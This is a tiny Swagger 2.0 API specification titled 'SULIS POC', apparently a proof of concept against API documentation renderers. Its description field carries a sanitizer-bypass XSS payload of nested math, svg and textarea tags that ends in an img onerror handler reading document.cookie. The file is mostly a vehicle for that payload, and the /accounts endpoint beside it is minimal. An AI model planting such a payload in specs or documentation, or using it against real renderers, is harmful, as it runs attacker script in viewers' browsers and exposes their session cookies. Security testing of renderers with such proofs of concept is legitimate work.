swagger: '2.0'
info:
  title: SULIS POC
  description: |
       <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(document.cookie)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        0: 
      operationId: findAccounts
      summary: [Client account information]
